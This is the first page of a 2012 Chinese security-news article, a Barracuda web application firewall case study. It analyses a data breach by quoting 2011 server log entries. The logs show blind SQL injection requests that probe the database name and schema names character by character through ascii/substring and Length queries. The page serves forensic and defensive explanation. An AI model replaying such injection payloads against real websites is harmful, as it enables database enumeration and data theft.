科技行者

行者学院 转型私董会 科技行者专题报道 网红大战科技行者

知识库

知识库 安全导航

至顶网安全频道应用安全梭子鱼WEB应用防火墙数据防泄露实战案例系列(一)

梭子鱼WEB应用防火墙数据防泄露实战案例系列(一)

  • 扫一扫
    分享文章到微信

  • 扫一扫
    关注官方公众号
    至顶头条

本文将具体探讨数据泄露是如何发生的,我们获得了哪些启示,以及梭子鱼Web应用防火墙会如何阻止正在进行的应用层攻击并有效防止进一步破坏。

来源:ZDNET安全频道 2012年2月8日

关键字: 数据泄露 Web应用防火墙 梭子鱼

  • 评论
  • 分享微博
  • 分享邮件

在本页阅读全文(共3页)

  数据泄露事件具体过程

  通过梭子鱼Web应用防火墙的日志,我们确认非法用户使用了两个客户端对网站进行探测和攻击:

  

梭子鱼WEB应用防火墙数据防泄露实战案例系列(一)

  使用梭子鱼Web应用防火墙报告的信息,我们能够迅速在Web服务器日志上过滤并查找到相应的记录条目。

  2011-04-10 03:19:17 GET /ns/customers/customer_verticals.php v=12”%20and%20ascii(substring((database()),13,1))=99%20and%20”x”=”x 80 - 87.1

  2011-04-10 03:19:17 GET /ns/customers/customer_verticals.php v=11”%20and%20ascii(substring((SELECT%20distinct%20schema_name%20from%

  2011-04-10 03:19:18 GET /ns/customers/customer_verticals.php v=12”%20and%20ascii(substring((database()),13,1))=98%20and%20”x”=”x 80 - 87.1

  2011-04-10 03:19:18 GET /ns/customers/customer_verticals.php v=12”%20and%20ascii(substring((database()),13,1))=97%20and%20”x”=”x 80 - 87.1

  2011-04-10 03:19:19 GET /ns/customers/customer_verticals.php v=11”%20and%20ascii(substring((SELECT%20distinct%20schema_name%20from%

  2011-04-10 03:19:21 GET /ns/customers/customer_verticals.php v=11”%20and%20ascii(substring((SELECT%20distinct%20schema_name%20from%

  2011-04-10 03:19:24 GET /ns/customers/customer_verticals.php v=11”%20and%20ascii(substring((SELECT%20distinct%20schema_name%20from%

  2011-04-10 03:19:26 GET /ns/customers/customer_verticals.php v=11”%20and%20ascii(substring((SELECT%20distinct%20schema_name%20from%

  2011-04-10 03:19:28 GET /ns/customers/customer_verticals.php v=11”%20and%20ascii(substring((SELECT%20distinct%20schema_name%20from%

  2011-04-10 03:19:31 GET /ns/customers/customer_verticals.php v=11”%20and%20ascii(substring((SELECT%20distinct%20schema_name%20from%

  2011-04-10 03:19:32 GET /ns/customers/customer_verticals.php v=11”%20and%20ascii(substring((SELECT%20distinct%20schema_name%20from%

  2011-04-10 03:19:33 GET /ns/customers/customer_verticals.php v=11”%20and%20ascii(substring((SELECT%20distinct%20schema_name%20from%

  2011-04-10 03:19:37 GET /ns/customers/customer_verticals.php v=11”%20and%20ascii(substring((SELECT%20distinct%20schema_name%20from%

  2011-04-10 03:19:39 GET /ns/customers/customer_verticals.php v=11”%20and%20ascii(substring((SELECT%20distinct%20schema_name%20from%

  2011-04-10 03:19:41 GET /ns/customers/customer_verticals.php v=11”%20and%20ascii(substring((SELECT%20distinct%20schema_name%20from%

  2011-04-10 03:19:46 GET /ns/customers/customer_verticals.php v=11”%20and%20ascii(substring((SELECT%20distinct%20schema_name%20from%

  2011-04-10 03:19:48 GET /ns/customers/customer_verticals.php v=11”%20and%20ascii(substring((SELECT%20distinct%20schema_name%20from%

  2011-04-10 03:19:48 GET /ns/customers/customer_verticals.php v=12”%20and%20Length((SELECT%20distinct%20schema_name%20from%20info

  2011-04-10 03:19:49 GET /ns/customers/customer_verticals.php v=12”%20and%20Length((SELECT%20distinct%20schema_name%20from%20info

  2011-04-10 03:19:51 GET /ns/customers/customer_verticals.php v=11”%20and%20ascii(substring((SELECT%20distinct%20schema_name%20from%

  2011-04-10 03:19:51 GET /ns/customers/customer_verticals.php v=12”%20and%20Length((SELECT%20distinct%20schema_name%20from%20info

  2011-04-10 03:19:52 GET /ns/customers/customer_verticals.php v=12”%20and%20Length((SELECT%20distinct%20schema_name%20from%20info

  2011-04-10 03:19:53 GET /ns/customers/customer_verticals.php v=11”%20and%20ascii(substring((SELECT%20distinct%20schema_name%20from%

  2011-04-10 03:19:53 GET /ns/customers/customer_verticals.php v=12”%20and%20Length((SELECT%20distinct%20schema_name%20from%20info

  2011-04-10 03:19:54 GET /ns/customers/customer_verticals.php v=12”%20and%20Length((SELECT%20distinct%20schema_name%20from%20info

  2011-04-10 03:19:54 GET /ns/customers/customer_verticals.php v=11”%20and%20ascii(substring((SELECT%20distinct%20schema_name%20from%

  2011-04-10 03:19:54 GET /ns/customers/customer_verticals.php v=12”%20and%20Length((SELECT%20distinct%20schema_name%20from%20info

  2011-04-10 03:19:55 GET /ns/customers/customer_verticals.php v=12”%20and%20ascii(substring((SELECT%20distinct%20schema_name%20from%

  2011-04-10 03:19:57 GET /ns/customers/customer_verticals.php v=12”%20and%20ascii(substring((SELECT%20distinct%20schema_name%20from%

  2011-04-10 03:19:57 GET /ns/customers/customer_verticals.php v=11”%20and%20ascii(substring((SELECT%20distinct%20schema_name%20from%

  2011-04-10 03:19:57 GET /ns/customers/customer_verticals.php v=12”%20and%20ascii(substring((SELECT%20distinct%20schema_name%20from%

  注:Web 日志使用的是格林威治标准时间(GMT),而 Web 应用防火墙使用的是太平洋夏令时(PDT)

  通过仔细查看梭子鱼Web 应用防火墙的每个日志条目,我们找到了攻击者及其所用工具的线索:

  

梭子鱼WEB应用防火墙数据防泄露实战案例系列(一)

    • 评论
    • 分享微博
    • 分享邮件
    邮件订阅

    如果您非常迫切的想了解IT领域最新产品与技术信息,那么订阅至顶网技术邮件将是您的最佳途径之一。

    重磅专题
    往期文章
    最新文章